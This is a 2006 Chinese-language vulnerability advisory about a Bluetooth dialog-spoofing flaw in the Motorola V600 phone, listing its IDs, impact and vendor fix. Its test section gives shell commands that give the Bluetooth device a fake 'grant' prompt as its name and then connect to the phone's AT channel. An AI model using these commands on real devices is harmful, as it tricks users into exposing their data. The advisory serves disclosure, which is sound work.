Motorola蓝牙接口存在对话框伪造漏洞
来源:岁月联盟
时间:2006-03-25
Motorola V600支持蓝牙功能。
Motorola V600蓝牙接收存在对话框伪造问题,远程安全者可以利用漏洞获得敏感信息。
当接收到蓝牙通信时,安全者可利用该问题诱使用户进入AT访问设备,可借此获得敏感信息。
BUGTRAQ ID: 17190
CNCAN ID:CNCAN-2006032305
漏洞消息时间:2006-03-22
漏洞起因
输入验证错误
影响系统
Motorola V600
危害
远程安全者可以利用漏洞获得敏感信息。
安全所需条件
安全者必须可以访问Motorola V600。
测试方法
# hciconfig hci0 name `perl -e 'print "Press/x0dgrant/x0dto/x0ddisable/x0dmute/x0d/x0d"'`
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup
厂商解决方案
联系供应商获得补丁方案:
http://www.motorola.com/motoinfo/product/details/0,,11,00.html
漏洞提供者
Kevin Finisterre
漏洞消息链接
http://marc.theaimsgroup.com/?l=bugtraq&m=114304846013066&w=2
漏洞消息标题
DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline
